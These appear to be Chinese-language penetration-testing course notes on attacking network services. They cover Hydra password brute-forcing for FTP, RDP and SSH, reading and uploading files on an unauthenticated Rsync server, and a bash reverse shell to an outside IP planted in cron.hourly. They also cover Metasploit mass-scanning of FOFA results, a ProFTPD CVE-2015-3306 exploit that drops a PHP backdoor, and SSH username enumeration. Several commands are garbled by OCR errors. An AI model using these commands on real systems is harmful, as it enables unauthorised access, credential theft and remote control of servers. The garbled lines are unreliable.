第57天 服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批量扫描&口令拆解
知识点:
1、服务攻防-远程控制&文件传输等
2、远程控制-RDP&RDP&弱口令&漏洞
3、文件传输-FTP&Rsyc&弱口令&漏洞
章节内容:
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制特定安全漏洞
3、安全机制-弱口令爆破攻击
前置知识:
应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属数据库&文件传箱&通讯等
3、判断服务利用方式特定漏洞&未授权&弱口令等
演示案例:
口令猜解-Hydra-FTP&RDP&SSH
配置不当-未授权访问-Rsync文件备份
高端课程-直接搜哈-MSF&Fofaviewer
协议漏洞-应用软件-FTP&Proftpd搭建
协议漏洞-应用软件-SSH&libssh&Openssh
☐令猜解-Hydra-FTP&RDP&SSH
https://github.com/vanhauser-thc/thc-hydra
hydra是一个自动化的爆破工具,暴力破解弱密码,
是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-C使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-S大写,采用SSL链接
-s PORT 指定默认端口
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
配置不当-未授权访问-Rsync文件备份
rsync是Linux下一款数据备份工具,支持通过rSnc协议、ssh协议进行远程文件传输。其
中rsynct协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密
码,我们将可以读写目标服务器文件。
判断:rsync rsync:∥123.58.236.76:45854/
利用:
-读取文件:rsync rsync:/123.58.236.76:45854/src/
-下载文件:rsync rsync:/123.58.236.76.45854/src/etc/passwd/
-上传文件:rsync-av passwd rsync:/123.58.236.76:45854/src/tmp/passwd
反弹shell:
1、获取信息:
rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt
2.创建文件
touch shell
#!/bin/bash
/bin/bash-i>&/dev/tcp/47.94.236.117/55660>&1
chmod +x shell
3、上传文件
rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly
4、等待接受反弹
高端课程-直接搜哈-MSF&Fofaviewer
https://github.com/wgpsec/fofa_viewer
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
思路:使用fofa查询端口为873的资产,使用msf批量扫描目的资产
协议漏同-应用软件-FTP&Proftpd搭建
https://github.com/tokx/exploit-CVE-2015-3306
python exploit.py --host 123.58.236.76–port 24967–path “/var/www/html/”
http://123:58.236:76.19758/backdoorphp?cmd=id
协议漏洞-应用软件-SSH&libssh&Openssh
openssh CVE-2014-0160CVE-2018-15473cve202015778
CVE-2014-0160版本很少
cve_2020_15778价值不高(需要普通用户账号密码,可以返回shell但是权限仍是普通用户)
环境效果:不可以ssh连接,可以使用scp
CVE-2018-15473-用户名枚举
https://github.com/Rhynorater/CVE-2018-15473-Exploit
pip3 install-r requirements.txt
pip3 install paramiko==2.4.1
python sshUsernameEnumExploit py–port 32013–userList examplelnput.txt
123.58.236.76